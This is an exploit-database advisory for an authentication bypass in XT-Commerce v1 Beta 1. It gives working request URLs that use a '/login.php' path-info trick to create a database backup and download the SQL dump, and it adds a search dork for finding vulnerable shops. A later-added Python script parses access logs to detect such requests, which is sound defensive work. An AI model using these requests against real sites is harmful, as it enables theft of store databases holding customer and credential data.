XT-Commerce v1 Beta 1 => by Pass / Creat + Download Backup Vuln

2010-04-29T00:00:00
ID 1337DAY-ID-12056
Type zdt
Reporter indoushka
Modified 2010-04-29T00:00:00

Description

Exploit for php platform in category web applications

                                        
==========================================================================
XT-Commerce v1 Beta 1 => by Pass / Creat and Download Backup Vulnerability
==========================================================================

========================================================================================                 
| # Title    : XT-Commerce v1 Beta 1 => by Pass / Creat and Download Backup Vulnerability  
| # Author   : indoushka                                                              
| # email    : [email protected]                                                                                                                                                                   
| # Dork     : Powered by XT-Commerce                                                                                                              
| # Tested on: windows SP2 Français V.(Pnx2 2.0)
| # Bug      : Backup                                                                    
======================      Exploit By indoushka       =================================
# Exploit  : 
 
http://127.0.0.1/XT-Commerce/admin/backup.php/login.php?action=backupnow
 
To download the backup: http://127.0.0.1/XT-Commerce/admin/backup.php/login.php?action=download&file=db_comm-20100301222138.sql
 
db_comm-20100301222138.sql: change it to the name of the backup. You can't download it with IE; I downloaded it with Opera 10.10 + Mozilla Firefox.
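
For log review, an added detection example (not part of the original advisory or of XT-Commerce): it flags access-log requests whose path has the shape shown above, an admin script followed by /login.php, and marks the ones where a backup download returned 200. The combined log format, the sample lines, the client addresses and the function name are assumptions constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined format); addresses are documentation ranges.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Mar/2010:22:21:30 +0100] "GET /XT-Commerce/admin/backup.php/login.php?action=backupnow HTTP/1.1" 200 512 "-" "Opera/9.80"
198.51.100.7 - - [01/Mar/2010:22:21:38 +0100] "GET /XT-Commerce/admin/backup.php/login.php?action=download&file=db_comm-20100301222138.sql HTTP/1.1" 200 48211 "-" "Opera/9.80"
203.0.113.5 - - [01/Mar/2010:22:25:02 +0100] "GET /XT-Commerce/admin/login.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.5 - - [01/Mar/2010:22:25:40 +0100] "GET /XT-Commerce/admin/backup.php?action=backupnow HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# client, method, request target and status from a combined-format line
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# an admin script followed by extra path info that ends in login.php
PATHINFO_LOGIN = re.compile(r'/admin/([^/]+\.php)/(?:.*/)?login\.php$', re.IGNORECASE)


def find_pathinfo_login_requests(log_text):
    """Return one record per request shaped like admin/<script>.php/login.php."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue  # not a combined-format request line
        client, method, target, status = m.groups()
        url = urlsplit(target)
        # decode percent-escapes so an encoded slash or dot does not hide the shape
        script = PATHINFO_LOGIN.search(unquote(url.path))
        if not script:
            continue
        query = parse_qs(url.query)
        action = query.get("action", [""])[0]
        hits.append({
            "client": client,
            "script": script.group(1),
            "action": action,
            "file": query.get("file", [""])[0],
            # a 200 on action=download suggests a database dump left the server
            "backup_served": action == "download" and status == "200",
        })
    return hits


if __name__ == "__main__":
    for hit in find_pathinfo_login_requests(SAMPLE_LOG):
        print(hit)
```

The plain /admin/login.php request and the redirected /admin/backup.php request in the sample are not flagged; only the two requests carrying the extra /login.php path segment are.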


